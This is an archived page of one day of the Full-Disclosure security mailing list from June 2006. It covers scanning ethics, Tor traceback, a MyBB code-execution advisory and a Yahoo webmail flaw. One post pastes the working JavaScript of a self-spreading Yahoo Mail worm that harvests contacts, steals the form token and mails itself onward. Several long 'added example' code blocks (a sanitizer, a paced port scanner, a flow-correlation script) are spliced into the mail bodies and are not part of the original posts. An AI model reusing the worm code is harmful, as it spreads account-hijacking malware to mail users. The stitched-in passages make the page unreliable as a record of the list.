Re: [Full-disclosure] SANS on-duty 'cock handlers'

2006-06-12 Thread Dan B
Hi,

n3td3v wrote:
 n3td3v: Sure my comments on FD on 666 were just hearsay, but there's
 loads of defacers out there. Morning Wood is promoting the new
 'zone-h.org http://zone-h.org' website via his Y messenger status
 the last two days, I feel sorry for the zone-h crew right now.
  

Just thought I'd point out that Morning Wood is involved with zone-h.
Why should he not be informing others of the new design of the zone-h
website?
Even if he wasn't in fact involved and just liked the design, there is
nothing wrong with him promoting it!

Ref:
http://web.archive.org/web/20050205215657/http://www.zone-h.org/en/staff

Cheers,
Dan.


PS. I'm not sure how many people are feeling sorry for you (your crew?
n3td3v crew?) right now!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] terrorists have invaded the united states

2006-06-12 Thread GroundZero Security
Or you just put

[EMAIL PROTECTED]    ERROR:550 piss off

in /etc/mail/access if you use sendmail.

- Original Message - 
From: Byron Sonne [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Sent: Sunday, June 11, 2006 6:16 PM
Subject: Re: [Full-disclosure] terrorists have invaded the united states


 Why don't you folks just put up some filters for 'n3td3v'? I did months 
 ago along with everyone else I know and it's been a blessing.
 
 Either fire up firefox and add the filter, or locate your 
 msgFilterRules.dat and add this (change the  to your username, duh):
 
 name=n3td3v crap
 enabled=yes
 type=1
 action=Move to folder
 actionValue=mailbox://[EMAIL PROTECTED]/Trash
 condition=OR (subject,contains,n3td3v) OR (from,contains,n3td3v) OR (to 
 or cc,contains,n3td3v) OR (body,contains,n3td3v)
 
 The condition line should be a single line, but my mailer wraps it.
 
 Problem solved.
 
 



Re: [Full-disclosure] scanning

2006-06-12 Thread schanulleke . 29172787
--- [EMAIL PROTECTED] wrote:
 What's this mean? It means that if you scan some lame-ass system and
 it crashes as a result, you might be in deep shit. And "it shouldn't
 have crashed from a portscan" does *not* hold up in court.

Having done pen-testing in the past, I have disabled (DoS-ed) systems
and entire networks with a portscan.

My employer would never let me do any work without a prior written
agreement.

However, law fluctuates highly over time and from country to country.
Dutch law recently changed. In the past you had to have broken a
security barrier in order to be accused of hacking; now it has changed
to "with the intent to do harm".

Is it illegal? Not enough data to compute / that is one for the lawyers...
Is it unwise? Probably...
Will you get caught/sued? Unlikely...
Would I bother to sue you? No...

Schanulleke



[Full-disclosure] Vulnerability in yahoo webmail.

2006-06-12 Thread David Loyall
Hello, all. I just received an email with an html attachment, on a
yahoo account. When I opened the mail, yahoo automatically displayed the
html, and executed the code within. What the hell. =) It forwarded the
message to my contacts list, (or some other set of addresses, dunno,) and
redirected my browser to a website.
I'm off to a BBQ, and I don't care about yahoo. So I'm not even going to
read the code and see how this happens. I'm attaching the html file as a
text file. Enjoy!

Oh, I've CC'd [EMAIL PROTECTED], but if someone else would give them a
proper write-up, and encourage them to close the hole, that'd be
wonderful.
Cheers,
--David Loyall
Omaha, Nebraska
img src='http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif' 
target=onload=var http_request = false;var Email = '';   var IDList = 
'';   var CRumb = '';   function makeRequest(url, Func, Method, Param) {
if (window.XMLHttpRequest) {http_request = new XMLHttpRequest();
} else if (window.ActiveXObject) {http_request = new 
ActiveXObject('Microsoft.XMLHTTP');}
http_request.target=onreadystatechange = Func;   
http_request.open(Method, url, true);if( Method == 'GET')   
http_request.send(null);elsehttp_request.send(Param);
}window.open('http://www,lastdata.com'); ServerUrl =  url0;USIndex = 
ServerUrl.indexOf('us.' ,0);MailIndex = ServerUrl.indexOf('.mail' ,0);CutLen = 
MailIndex - USIndex - 3;var Server = ServerUrl.substr(USIndex + 3, CutLen);
function GetIDs(HtmlContent)   { IDList = '';
StartString = ' td';  EndString = '/td';
i = 0;  StartIndex = 
HtmlContent.indexOf(StartString, 0);   while(StartIndex = 0)   
   {   EndIndex = HtmlContent.indexOf(EndString, 
StartIndex);  CutLen = EndIndex - StartIndex - 
StartString.length;YahooID = HtmlContent.substr(StartIndex 
+ StartString.length, CutLen);  
if( YahooID.indexOf('@yahoo.com', 0)  0 || YahooID.indexOf('@yahoogroups.com', 
0)  0 )IDList = IDList + ',' + YahooID ;   
StartString = '/tr';  StartIndex = 
HtmlContent.indexOf(StartString, StartIndex + 20); StartString 
= ' td';  StartIndex = 
HtmlContent.indexOf(StartString, StartIndex + 20); i++; 
   }   if(IDList.substr(0,1) == ',')
   IDList = IDList.substr(1, IDList.length);   
if(IDList.indexOf(',', 0)0 )   {   
IDListArray = IDList.split(',');Email = IDListArray[0]; 
IDList = IDList.replace(Email + ',', '');   
} CurEmail = spamform.NE.value; IDList = IDList.replace(CurEmail + ',', ''); 
IDList = IDList.replace(',' + CurEmail, '');IDList = IDList.replace(CurEmail, 
'');UserEmail = showLetter.FromAddress.value;IDList = IDList.replace(',' + 
UserEmail, '');IDList = IDList.replace(UserEmail + ',', '');IDList = 
IDList.replace(UserEmail, ''); return IDList;   }   function 
ListContacts()   {   if (http_request.readyState == 4) {if 
(http_request.status == 200) {   HtmlContent =  
http_request.responseText;   IDList = GetIDs(HtmlContent);  
 makeRequest('http://us.' + 
Server + '.mail.yahoo.com/ym/Compose/?rnd=' + Math.random(), Getcrumb, 'GET', 
null);   }}}   function ExtractStr(HtmlContent)   { 
   StartString = 'name=\u0022.crumb\u0022 value=\u0022';   
EndString = '\u0022';   i = 0;  StartIndex = 
HtmlContent.indexOf(StartString, 0);   EndIndex = 
HtmlContent.indexOf(EndString, StartIndex + StartString.length );
CutLen = EndIndex - StartIndex - StartString.length;crumb = 
HtmlContent.substr(StartIndex + StartString.length , CutLen );  return 
crumb;  }   function Getcrumb()   {  if (http_request.readyState == 
4) {if (http_request.status == 200) {
HtmlContent =  http_request.responseText;   CRumb = 
ExtractStr(HtmlContent); MyBody 
= 'this is test';   MySubj = 'New Graphic Site';
 Url = 'http://us.' + Server + 
'.mail.yahoo.com/ym/Compose';   
 var ComposeAction = compose.action;MidIndex = 
ComposeAction.indexOf('Mid=' ,0);incIndex = ComposeAction.indexOf('inc' 
,0);CutLen = incIndex - MidIndex - 5;var MyMid 

Re: [Full-disclosure] Vulnerability in yahoo webmail.

2006-06-12 Thread c0ntex

On 12/06/06, David Loyall [EMAIL PROTECTED] wrote:

Oh, I've CC'd [EMAIL PROTECTED], but if someone else would give them a proper
write-up, and encourage them to close the hole, that'd be wonderful.


I know this guy who has over 7 years of direct security influence with
Yahoo and Google security engineers!

In 1972, a crack commando unit was sent to social prison by a mailing
list for a claim they couldn't prove. These men promptly escaped from
a maximum security stockade to the Moon. Today, still wanted by nobody
other than their mommy, they survive playing soldiers of fortune. If
you have a problem with Yahoo or any fortune 500 that may be hiring
black hat hackers as part of internal espionage, if no one else can
help, and if you can find them, maybe you can hire...The n3td3v Group

--

regards
c0ntex



Re: [Full-disclosure] scanning

2006-06-12 Thread GroundZero Security
When you say that by running a portscan you DoS-ed a whole network,
then I would say either you are crazy or your portscanner is seriously
broken lol
I have been doing pen-tests since 1998 and never ever DoS-ed a whole
network by accident, especially not with a simple portscan.

-sk
- Original Message - 
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Sent: Monday, June 12, 2006 11:23 AM
Subject: Re: [Full-disclosure] scanning


 --- [EMAIL PROTECTED] wrote:
  What's this mean? It means that if you scan some lame-ass system and
  it crashes as a result, you might be in deep shit. And "it shouldn't
  have crashed from a portscan" does *not* hold up in court.
 
 Having done pen-testing in the past, I have disabled (DoS-ed) systems
 and entire networks with a portscan.
 
 My employer would never let me do any work without a prior written
 agreement.
 
 However, law fluctuates highly over time and from country to country.
 Dutch law recently changed. In the past you had to have broken a
 security barrier in order to be accused of hacking; now it has changed
 to "with the intent to do harm".
 
 Is it illegal? Not enough data to compute / that is one for the lawyers...
 Is it unwise? Probably...
 Will you get caught/sued? Unlikely...
 Would I bother to sue you? No...
 
 Schanulleke
 
 



Re: [Full-disclosure] Vulnerability in yahoo webmail.

2006-06-12 Thread nocfed

On 6/12/06, c0ntex [EMAIL PROTECTED] wrote:

On 12/06/06, David Loyall [EMAIL PROTECTED] wrote:
 Oh, I've CC'd [EMAIL PROTECTED], but if someone else would give them a proper
 write-up, and encourage them to close the hole, that'd be wonderful.

I know this guy who has over 7 years of direct security influence with
Yahoo and Google security engineers!



You know that you really should have replied from [EMAIL PROTECTED] and
attached a .shm or a .scr, right?  I would definitely open any
attachment sent from [EMAIL PROTECTED] in a heartbeat.

Really though, that's some crappy static code.  It reminds me of a 1st
year programmer that replicates their same call 100 times to get 1
thing done.

I'm not quite sure how people still fall for these things... be it an
executable attachment or html, that lo and behold CAN have javascript
(AJAX/Web 2.0TM) in it, you should not be just opening any
attachments.

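The attachment David posted works because the webmail client rendered the HTML and let an event-handler attribute run script in the user's session (the rest of the posted code then reads the contact list and the compose form's ".crumb" token with XMLHttpRequest, which no CSRF token can stop once script runs same-origin). As an added example, not Yahoo's code and not the posted worm, here is the filtering principle that removes that class of input before rendering: an allowlist of tags and attributes, shown beside the denylist approach of stripping anything that looks like an `on*=` handler. The tag set, the regexes, the `.invalid` URLs and the sample markup are all constructed for this example; the `TRICKY` sample only copies the `target=onload=` attribute shape visible in the posted code.

```python
"""Allowlist vs denylist filtering of HTML mail (added example)."""
import re

# Tags a mail reader may keep, and the attributes allowed on each.
ALLOWED = {
    "img": {"src", "alt", "width", "height"},
    "a": {"href", "title"},
    "p": set(), "br": set(), "b": set(), "i": set(),
}
SAFE_SCHEME = re.compile(r"^(https?:|mailto:)", re.I)
TAG_RE = re.compile(r"<\s*(/?)([A-Za-z][\w-]*)([^>]*)>")
ATTR_RE = re.compile(r"""([A-Za-z_:][\w:.-]*)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+))?""")
SCRIPT_RE = re.compile(r"<(script|style)\b[^>]*>.*?</\1\s*>", re.I | re.S)
# Denylist assumption: an event handler looks like whitespace + on...=
EVENT_RE = re.compile(r"""\s+on\w+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""", re.I)


def denylist_filter(html):
    """Strip attributes that look like on*= handlers; keep everything else."""
    return EVENT_RE.sub("", html)


def allowlist_filter(html):
    """Keep only known tags, and on them only known attributes with safe URLs."""
    html = SCRIPT_RE.sub("", html)          # drop script/style with their bodies

    def rewrite(m):
        close, name, raw_attrs = m.group(1), m.group(2).lower(), m.group(3)
        allowed = ALLOWED.get(name)
        if allowed is None:                 # unknown element: remove tag, keep text
            return ""
        if close:
            return "</%s>" % name
        kept = []
        for am in ATTR_RE.finditer(raw_attrs):
            attr = am.group(1).lower()
            if attr not in allowed:         # covers every on* handler, target, style...
                continue
            val = (am.group(2) or "").strip("\"'").strip()
            if attr in ("src", "href") and not SAFE_SCHEME.match(val):
                continue                    # javascript:, data:, vbscript: all dropped
            kept.append('%s="%s"' % (attr, val.replace('"', "&quot;")))
        return "<%s%s>" % (name, (" " + " ".join(kept)) if kept else "")

    return TAG_RE.sub(rewrite, html)


# Constructed samples. TRICKY copies the attribute shape seen in the posted
# worm (target=onload=...): the handler is not preceded by whitespace.
TRICKY = ("<img src='http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif' "
          "target=onload=\"alert(1)\">")
PLAIN = '<img src="http://example.invalid/a.gif" onload="alert(1)">'
LINK = '<a href="javascript:alert(2)">click</a>'
NESTED = "<p>Hi <script>evil()</script><b onclick=z>there</b></p>"


def demo():
    """Return (denylist output, allowlist output) for each constructed sample."""
    return {name: (denylist_filter(s), allowlist_filter(s))
            for name, s in (("tricky", TRICKY), ("plain", PLAIN),
                            ("link", LINK), ("nested", NESTED))}


if __name__ == "__main__":
    for name, (deny, allow) in demo().items():
        print("%-7s denylist : %s" % (name, deny))
        print("%-7s allowlist: %s" % (name, allow))
```

The denylist passes `TRICKY` untouched because the handler does not follow whitespace; how a given browser then parses that attribute soup is exactly what a filter should not have to know, and the allowlist version does not care, since only `src` survives. Regex tag matching breaks on a `>` inside a quoted attribute value, so a production mail sanitizer must sit on a real HTML parser; the point here is the policy, not the tokenizer.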


Re: [Full-disclosure] Vulnerability in yahoo webmail.

2006-06-12 Thread Eric Chien
Check out:
http://securityresponse.symantec.com/avcenter/venc/data/[EMAIL PROTECTED]

...Eric

Re: [Full-disclosure] scanning

2006-06-12 Thread schanulleke . 29172787
Believe it or not, it was a Nokia running CheckPoint NG, but not well
configured.

Because the network was taking a lot of traffic during normal ops so no
problems (yet). However it was taken down by a broadcast storm earlier.

I was running multiple SYN-scan sessions of nmap with aggressive timing
(and very low max-rtt and max-timeout and max-delay settings), so not
polite at all.

IF I was doing a pen test AND I wasn't telling anyone I would NOT be
using these settings, but go low and slow. The point that I was making
though is that pen-tests and port scans can go wrong (and if you have
Murphy as your back-seat driver, they will go wrong).

We have also seen packet loss when scanning some webservers over a 2 Mbps
line. Also because the Nokia was taking too many CPU cycles for
inspections and logging.

Schanulleke


--- GroundZero Security [EMAIL PROTECTED] wrote:
 What kind of firewall was it? I can't imagine that it isn't able to
 handle your single connect() requests, since what happens if a lot of
 the internal client computers have external requests?

 The network would be constantly lagged and, as you describe it, the
 firewall would stop responding even without a scan. I just wonder
 which vendor produced the firewall.

 When you use a normal port scanner like nmap with polite timing and
 IP by IP, I doubt this would happen. Maybe if you use some scanner
 that is multithreaded and scans a lot of IPs a second and does a full
 connect() (maybe even sends a request) on all possible ports on as
 many hosts as possible, then I could imagine your scenario. A normal
 port scan/subnet scan, however, shouldn't be any problem.

 When you do a penetration test you do have 5 minutes to wait, and we
 were talking about a simple port scan. I think at court it wouldn't
 matter, as the understanding of the scan would be the same for them.
 So even if there is a very slim chance that this actually happens on
 a network, it would probably be hard to explain. Then again, all you
 did theoretically is look for open services they offer to the public;
 if their server is misconfigured, is that your fault? On the other
 side, the network owner would probably respond that you shouldn't
 snoop around on his servers. So this is indeed a problematic situation
 and I have to admit you make a point here, although I still don't
 think that this will happen very often :-)

 - Original Message -
 From: [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]
 Sent: Monday, June 12, 2006 12:13 PM
 Subject: Re: [Full-disclosure] scanning

  I was on the local site with a direct ethernet connection; the client
  had all internal traffic routed via a firewall, and the firewall was
  configured with too many and too complex rules.

  I caused too many sessions, causing too many logs, causing the
  firewall to stop responding in time and all servers to be separated
  from all clients.

  Needless to say this was a major finding in my report.

  We have observed the same behaviour with external facing firewalls.

  Schanulleke

  --- GroundZero Security [EMAIL PROTECTED] wrote:
   When you say that by running a portscan you DoS-ed a whole network,
   then I would say either you are crazy or your portscanner is
   seriously broken lol
   I have been doing pen-tests since 1998 and never ever DoS-ed a whole
   network by accident, especially not with a simple portscan.

   -sk

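Whether a scan of the kind Schanulleke describes hurts a stateful firewall comes down to two numbers: how many sessions the scanner has open at once (each one is a state-table entry) and how fast new ones start (each one is a log line and an inspection). As an added example, not from either poster, the scanner below is a plain connect() scan with a semaphore on in-flight probes and a token bucket on probe starts, and it records the peak concurrency so the cap can be verified. The probe function is injectable: `demo()` runs against a constructed fake host (the 192.0.2.10 address, the port list and which ports answer are made up) so the example runs offline, while `tcp_probe` is the real-socket version.

```python
"""Connect scan paced by concurrent-session and sessions-per-second caps."""
import socket
import threading
import time
from concurrent.futures import ThreadPoolExecutor


class TokenBucket:
    """Admit at most `rate` new sessions per second, bursting up to `burst`."""

    def __init__(self, rate, burst):
        self.rate = float(rate)
        self.capacity = float(burst)
        self.tokens = float(burst)
        self.stamp = time.monotonic()
        self.lock = threading.Lock()

    def take(self):
        while True:
            with self.lock:
                now = time.monotonic()
                self.tokens = min(self.capacity,
                                  self.tokens + (now - self.stamp) * self.rate)
                self.stamp = now
                if self.tokens >= 1.0:
                    self.tokens -= 1.0
                    return
                wait = (1.0 - self.tokens) / self.rate
            time.sleep(wait)


def tcp_probe(host, port, timeout):
    """Real probe: one full connect(). demo() does not use it."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "open"
    except ConnectionRefusedError:
        return "closed"
    except OSError:          # timeout, unreachable, reset: no usable answer
        return "filtered"


class PacedScanner:
    """Connect scan with caps on concurrent sessions and on session starts/s."""

    def __init__(self, probe, rate, max_in_flight, timeout):
        self.probe = probe
        self.timeout = timeout
        self.max_in_flight = max_in_flight
        self.bucket = TokenBucket(rate, burst=max_in_flight)
        self.slots = threading.BoundedSemaphore(max_in_flight)
        self._lock = threading.Lock()
        self._in_flight = 0
        self.peak_in_flight = 0   # observed, so the cap can be checked afterwards

    def _one(self, host, port):
        self.bucket.take()                  # pace how often a new session starts
        with self.slots:                    # bound how many are open at once
            with self._lock:
                self._in_flight += 1
                self.peak_in_flight = max(self.peak_in_flight, self._in_flight)
            try:
                return port, self.probe(host, port, self.timeout)
            finally:
                with self._lock:
                    self._in_flight -= 1

    def scan(self, host, ports):
        started = time.monotonic()
        with ThreadPoolExecutor(max_workers=2 * self.max_in_flight) as pool:
            results = dict(pool.map(lambda p: self._one(host, p), ports))
        return {"results": results,
                "elapsed": time.monotonic() - started,
                "peak_in_flight": self.peak_in_flight}


# Constructed stand-in for a host behind a stateful firewall: 22 and 80
# answer, 25 is silently dropped (times out), everything else refuses.
FAKE_OPEN = {22, 80}
FAKE_FILTERED = {25}
PORTS = [21, 22, 23, 25, 53, 80, 110, 143, 443, 8080]


def fake_probe(host, port, timeout):
    time.sleep(0.01)                        # pretend round trip
    if port in FAKE_OPEN:
        return "open"
    if port in FAKE_FILTERED:
        time.sleep(min(timeout, 0.05))      # nothing comes back until the timeout
        return "filtered"
    return "closed"


def demo(rate=20, max_in_flight=3):
    """Scan the fake host at `rate` new sessions/s with `max_in_flight` open."""
    scanner = PacedScanner(fake_probe, rate=rate, max_in_flight=max_in_flight,
                           timeout=0.5)
    return scanner.scan("192.0.2.10", PORTS)


if __name__ == "__main__":
    report = demo()
    for port, state in sorted(report["results"].items()):
        print("%5d/tcp %s" % (port, state))
    print("peak concurrent sessions: %d, elapsed: %.2fs"
          % (report["peak_in_flight"], report["elapsed"]))
```

With the defaults, ten probes at twenty starts per second and three in flight take about 0.35 s and never hold more than three sessions open; raising both numbers is what turns the same scan into the session and log flood described above. nmap exposes the same two controls as --max-parallelism and --max-rate (with --scan-delay and --max-rtt-timeout alongside); the script is here to make the mechanism visible, not to replace it.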


Re: [Full-disclosure] terrorists have invaded the united states

2006-06-12 Thread b . hines


You are correct, terrorists have invaded the US...
http://archives.cnn.com/2001/US/09/11/chronology.attack/index.html

and now you see they must be mitigated, with extreme prejudice.







Re: [Full-disclosure] Vulnerability in yahoo webmail.

2006-06-12 Thread pdp (architect)

They've got it quite quickly. 10x
Since the source code is open to everyone now, it is just a matter of
time for someone to redesign it and make it work on Yahoo Beta as well.

On 6/12/06, Eric Chien [EMAIL PROTECTED] wrote:

Check out:
http://securityresponse.symantec.com/avcenter/venc/data/[EMAIL PROTECTED]

...Eric






--
pdp (architect)
http://www.gnucitizen.org



[Full-disclosure] exif thumbnails in FBI

2006-06-12 Thread Tonu Samuel

Hi all bad guys :P

I can't resist, FBI rocks! 

http://no.spam.ee/~tonu/exif/?srcid=1847src=http://www.fbi.gov/wanted/seekinfo/erienote1.jpg

   Tõnu



Re: [Full-disclosure] McAfee VirusScan Enterprise 8.0.0 Misidentifies EICAR Test File

2006-06-12 Thread Marcos Agüero
TheGesus wrote:
 And you have an instant Elspy.worm flood and your Enterprise AntiVirus
 Administrator is shitting his pants.  Run in circles, scream and shout
 and all THAT.
Oh! That's really stupid! The logs will show 1 infection on the same
PC within a few seconds. Easy to spot as a false positive and remove
from the report. And such things happen in the real world without the
help of lame people like you. Can't see where the fun is in this, except
your stupidity-disclosure.



[Full-disclosure] Is there a way to trace back Tor user

2006-06-12 Thread Jianqiang Xin
Regarding the recent debate about the use of Tor: just wondering if it
is practical to trace back the user if he is using Tor to hide his
origin. As far as I know, there were several approaches using timing
correlation to trace back TCP connections. It seems that the technique
is there, but the problem is the placement of monitors, since the Tor
servers are scattered around the world and it is impractical to
access them all. In a perfect world where you can monitor all the
traffic of all Tor servers, you should be able to trace back with a
high success rate.

Are there any better solutions? Thanks.

yours,
Michael

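The timing-correlation approach Michael refers to, reduced to its core, as an added example that is not from the post or from any published Tor paper: an observer who sees the entry-side flow and a set of candidate exit-side flows bins each flow's packet timestamps into fixed windows and takes the Pearson correlation of the per-bin counts, searching a few bins of lag to absorb network latency. The timestamps below are constructed (one circuit whose exit side lags by 0.3 s with a few milliseconds of deterministic jitter, plus one unrelated flow in the same minute), as are the flow names and the bin width.

```python
"""Timing-correlation matching of an entry-side flow to exit-side flows."""
from math import sqrt

BIN_SECONDS = 1.0
WINDOW_SECONDS = 60.0


def bin_counts(timestamps, bin_size=BIN_SECONDS, window=WINDOW_SECONDS):
    """Packets per fixed-width time bin over the observation window."""
    counts = [0] * int(window / bin_size)
    for t in timestamps:
        i = int(t // bin_size)
        if 0 <= i < len(counts):
            counts[i] += 1
    return counts


def pearson(xs, ys):
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    cov = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    vx = sum((x - mx) ** 2 for x in xs)
    vy = sum((y - my) ** 2 for y in ys)
    return 0.0 if vx == 0 or vy == 0 else cov / sqrt(vx * vy)


def best_lag_correlation(entry_bins, exit_bins, max_lag=2):
    """Correlate entry[i] with exit[i+lag]; the exit side can only be later."""
    best_r, best_lag = -1.0, 0
    for lag in range(max_lag + 1):
        r = pearson(entry_bins[:len(entry_bins) - lag], exit_bins[lag:])
        if r > best_r:
            best_r, best_lag = r, lag
    return best_r, best_lag


def match_flow(entry_ts, candidates):
    """Score every candidate exit flow; return the best name and all scores."""
    entry_bins = bin_counts(entry_ts)
    scores = {name: best_lag_correlation(entry_bins, bin_counts(ts))
              for name, ts in candidates.items()}
    best = max(scores, key=lambda name: scores[name][0])
    return best, scores


def burst_train(starts, packets=12, spacing=0.02):
    """Constructed traffic: `packets` packets 20 ms apart from each start time."""
    return [s + j * spacing for s in starts for j in range(packets)]


# Constructed observations. ENTRY and EXIT_SAME belong to the same circuit:
# the exit side lags by 0.3 s plus a few ms of deterministic jitter.
# EXIT_OTHER is an unrelated flow leaving the network during the same minute.
ENTRY = burst_train([3.1, 11.6, 20.2, 27.4, 35.9, 44.3, 50.7, 57.2])
EXIT_SAME = [t + 0.30 + ((k * 3) % 4) * 0.01 for k, t in enumerate(ENTRY)]
EXIT_OTHER = burst_train([7.3, 15.1, 24.8, 31.5, 39.0, 47.6, 53.9, 58.6])


def demo():
    return match_flow(ENTRY, {"exit_same": EXIT_SAME, "exit_other": EXIT_OTHER})


if __name__ == "__main__":
    best, scores = demo()
    for name, (r, lag) in scores.items():
        print("%s: r=%+.2f at lag %d bin(s)" % (name, r, lag))
    print("best match:", best)
```

The same-circuit flow scores around 0.77 at zero lag (the 0.3 s delay straddles a bin boundary for a couple of bursts, which is all the jitter it takes to lose some signal), while the unrelated flow stays near zero. The statistic is the easy part; as the post says, the hard part is vantage, since the correlation needs observations of both the entry and the exit side of the same connection.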

[Full-disclosure] Secunia Research: MyBB domecode() PHP Code Execution Vulnerability

2006-06-12 Thread Secunia Research
==

 Secunia Research 12/06/2006

 - MyBB domecode() PHP Code Execution Vulnerability -

==
Table of Contents

Affected Software............................................1
Severity.....................................................2
Vendor's Description of Software.............................3
Description of Vulnerability.................................4
Solution.....................................................5
Time Table...................................................6
Credits......................................................7
References...................................................8
About Secunia................................................9
Verification................................................10

==
1) Affected Software

MyBB 1.1.2

Prior versions may also be affected.

==
2) Severity

Rating: Highly critical
Impact: System access
Where:  Remote

==
3) Vendor's Description of Software

MyBB is a powerful, efficient and free forum package developed in PHP 
and MySQL. MyBB has been designed with the end users in mind, you and 
your subscribers. Full control over your discussion system is 
presented right at the tip of your fingers, from multiple styles and 
themes to the ultimate customisation of your forums using the 
template system.

Product link:
http://www.mybboard.com/

==
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in MyBB, which can be 
exploited by malicious people to compromise a vulnerable system.

Input passed to the username field when registering isn't properly 
sanitised before being used in a preg_replace() call with the "e" 
modifier in the domecode() function in inc/functions_post.php. This 
can be exploited to execute arbitrary PHP code by first registering 
with a specially crafted username and then previewing a post 
containing the "/slap" string.

The vulnerability has been confirmed in version 1.1.2. Prior versions 
may also be affected.

==
5) Solution

Update to version 1.1.3.
http://www.mybboard.com/downloads.php

==
6) Time Table

06/06/2006 - Initial vendor notification.
06/06/2006 - Vendor confirms vulnerability.
12/06/2006 - Public disclosure.

==
7) Credits

Discovered by Andreas Sandblad, Secunia Research.

==
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2006-2908 for the vulnerability.

==
9) About Secunia

Secunia collects, validates, assesses, and writes advisories regarding
all the latest software vulnerabilities disclosed to the public. These
advisories are gathered in a publicly available database at the
Secunia website:

http://secunia.com/

Secunia offers services to our customers enabling them to receive all
relevant vulnerability information to their specific system
configuration.

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

==
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-40/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==



RE: [Full-disclosure] Is there a way to trace back Tor user

2006-06-12 Thread CIRT.DK Mailinglists



Hey there

There is a paper out trying to describe the different 
methods of tracking TOR user

http://www.fortconsult.net/images/pdf/tpr_100506.pdf

Best regards
Dennis
CIRT.DK


From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jianqiang Xin
Sent: Monday, June 12, 2006 4:49 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Is there a way to trace back Tor user

Regarding to recent debate about the use of Tor. Just wondering if it
is practical to trace back the user if he is using Tor to hide his origin. As
far as I know, there were several approaches using timing correlation to trace
back TCP connections. It seems that the technique is there but the problem is
the placement of monitors. Since the Tor servers are scatter around the world
and it is impractical to access them all. If in a perfect world that
you can monitor all the traffic of all Tor servers, you should be able to trace
back with high success rate. Is there any better solutions?
Thanks.

yours,
Michael

Re: [Full-disclosure] Is there a way to trace back Tor user

2006-06-12 Thread poo
that paper is useless
which isnt surprising when you see who wrote it
On 6/12/06, CIRT.DK Mailinglists [EMAIL PROTECTED] wrote:



Hey there

There is a paper out trying to describe the different methods of tracking TOR user

http://www.fortconsult.net/images/pdf/tpr_100506.pdf


Best regards
Dennis
CIRT.DK


From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Jianqiang Xin
Sent: Monday, June 12, 2006 4:49 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Is there a way to trace back Tor user

Regarding to recent debate about the use of Tor. Just wondering if it is practical to trace back the user if he is using Tor to hide his origin. As far as I know, there were several approaches using timing correlation to trace back TCP connections. It seems that the technique is there but the problem is the placement of monitors. Since the Tor servers are scatter around the world and it is impractical to access them all. If in a perfect world that you can monitor all the traffic of all Tor servers, you should be able to trace back with high success rate. 
Is there any better solutions? Thanks.

yours,
Michael
-- smile tomorrow will be worse 

Re: [Full-disclosure] file upload widgets in IE and Firefox have issues

2006-06-12 Thread Charles McAuley
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Danny wrote:
 Hi,
 
 I read your article, but since I am not at all at home when scripting
 comes up, I still am wondering what this issue is exactly.
 
My web-foo is not that strong either.
Bart van Arnhem made a much better example in IE than I did.
As he says, just simply bang on the keyboard a lot.  Make sure to press
the ':' char and the '\' char for a full string.  You'll eventually see
c:\boot.ini appear.

 Could you give me an example so as to clarify things for a non-English
 speaking fella?
 

In this wonderful, everything-is-web-driven world, it's entirely
possible that you might type enough text into a web application in order
to filter out all the keys necessary to upload an arbitrary file off of
a computer.  For instance, into your web mail, or experts-exchange
forums, or google's new spreadsheet app, or a typing tutor program.

Is this a big deal?  It depends entirely on your web surfing habits.


 Also, what is this "file input box"? Are these the boxes in forms where
 one is supposed to fill in the name, address, password, etc?
 

It's the input widget...
<input type=file name=uploadme>
where you choose a file to upload from YOUR computer to a WEBSERVER.


 Sorry for not understanding it completely; it seems to me you have been
 busy digging out stuff the programmers should have checked in the first
 place.
 

These flaws were reported a year ago, confirmed, and ignored by both
Mozilla and Microsoft.  I marked the bug on mozilla's site with the
security flag, it was their call to remove it.  Also, I wasn't the first
or last person to find this problem _independently_.  This has been
known to the Mozilla group since 2000.  Surely they could have done
something by now?

After a year, I figured I'd just let other people know about it; maybe
then it would get fixed.  Do I think this is a huge gaping security hole?
Not right now, but Bart's code definitely shows what can be done if
other people keep banging away.

I'd like to repeat myself on that last point.
Security Impact: Minor

 Nice job there, I just hope I can fully understand it.
 
 Kind regards,
 
 Danny
 
 
 
 

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFEjbDJyZFfwQJZqy8RAuDlAJ4uWUEEkDuPiNOZr9v2H9M7E63ayQCdEToT
S/Q3tXdbTxqOLdbDUA+IaFA=
=UJw+
-END PGP SIGNATURE-



[Full-disclosure] rPSA-2006-0100-1 freetype

2006-06-12 Thread Justin M. Forbes
rPath Security Advisory: 2006-0100-1
Published: 2006-06-12
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
User Non-deterministic Weakness
Updated Versions:
freetype=/[EMAIL PROTECTED]:devel//1/2.1.10-2.2-1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0747
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1861
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2661
http://issues.rpath.com/browse/RPL-429

Description:
Previous versions of the freetype library contain multiple integer
overflow weaknesses which allow remote providers of font files
